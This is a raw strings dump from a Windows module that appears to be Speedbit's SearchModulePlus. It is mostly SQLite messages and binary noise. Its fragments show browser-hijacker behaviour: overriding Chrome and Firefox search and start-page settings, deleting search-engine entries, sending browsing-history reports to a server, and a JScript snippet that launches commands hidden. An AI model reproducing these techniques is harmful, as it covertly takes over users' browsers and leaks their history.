wNKF/mtSGBg2O7QHI1qiCaEFr4JJ1dCTCibfvDUMgTIY4O6BS09dnfU66wIflATHfn3Vmz2O50icTeJCWKS1jbawYcRi18oLSBwmpPDXEo2PN7yZL9HUZF1QouUtVmHVEdUE4rQByTqa1MVsX86qDqtUnory9jONYV/vH7d4ez2KHSdPTt9xp3DAUH6A6dfyDIuV/9p42DDcXnW76lM3U/CsGM D9wFWiE46fRg5YU7GaujJWF04ZND7q gtbYPtbQ5 c5GicyYhXm7 JEE0t2 umb1A3XkLpWHPgOskn6nDRqT8pogSUQIwAhh71cUWkOGDMbcf JXOSMxXP9kIlF0Hl83ZsuwOnCxDcq7fa7o4mw/XZQgWJ7s4hA8s3/oev6/GtZX1KRw0qxgWbFSByNpU9rJc7akt9ZTVy19DUC2bVf/S7 mDmdLTLXknZuoeYWL /Yu/KMHimnmPc3VbRijG9yMq346J4Uzg qdOxn2P9sq2/IGUhNgRHnYhWUtJpyCaS7J8aQXHlRip23vRRFZdpWvqMNS9BWHDk1ISh5GUkediSGfX6oTEL2qol6OQQa4sXuy2Ei75O6Mdxd8rEdObV9Nr8FAW0IXJI93aPpDKjCx12PbNKFWnWXhtfxNKNQd9uTCY=

2, 1, 9, 476

Envelop.xml

Configuration.xml

UrlSet

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

UpdateUrl

ReportUrl

ReportDlls

User.xml

urls

SELECT * FROM urls

ERROR: %s

WebData path:

Argument.GeneralConfig:

Argument.Snapshot:

Argument.Flags:

suggest_url

originating_url

favicon_url

keyword

keyword LIKE '

keywords

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

urls_to_restore_on_startup

chrome_url_overrides

template_url_data

www-searching.com

image_url_post_params

instant_url

instant_url_post_params

new_tab_url

search_terms_replacement_key

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

large file support is disabled

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

%s-shm

%s\etilqs_

OsError 0x%x (%u)

Recovered %d frames from WAL file %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

there is already another table or index with this name: %s

sqlite_

table %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

%s.%s

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

cannot use index: %s

TABLE %s

%s AS %s

%s WITH AUTOMATIC INDEX

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unknown database: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\smu.pdb

SHELL32.dll

SHLWAPI.dll

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

GetNamedPipeInfo

DisconnectNamedPipe

GetProcessHeap

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

</assembly>PADif (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i < n;   i)

args.push(WScript.Arguments(i));

var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";

path  = " \""   args.join("\" \"")   "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

0%0 01070

2(2-272[2

3#3-323<3`3

8„8C8[8

5)686=6{6

2%2U2h2

4%4u4|4

0(0;0`0}0

5&515?5[5

6'626@6\6{6

!00050=0

2,2U2f2x2

4)545?5|5

<'<0<;<`<

11\1{1

;7;<;[;`;

0!030`0}0

50656=6|6

7$7-787]7

6!6)6:6~6

2$3(3,3034383<3@3

7"7(7,7:7

1"2-2H2Q2}2

5(5!9&939

9!9(9/959

4W5D5

6q7:7]7

0
0=0`0

<&<2<;<^<

4L4j4

: :$:0:4:8:

2 2$2(2,2024282<2|4

8$8(8,8084888

= =$=(=,=0=4=8=<=

? ?$?(?,?0?4?8?

> >$>(>,>0>4>8><>

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking<Parameter.Input>

Checking<Parameter.Key>

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Google\Chrome

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation<ExecutionContext>

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\firefox.exe

E:\opera.exe

E:\Safari.exe|E:\navigator.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\browser.exe|E:\Maxthon.exe|E:\sbframe.exe|E:\avant.exe|E:\dragon.exe|E:\bobrowser.exe

smei32.dll

smci32.dll

smfi32.dll

smoi32.dll

smri32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

777705555443332

5555443332

5555443332

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]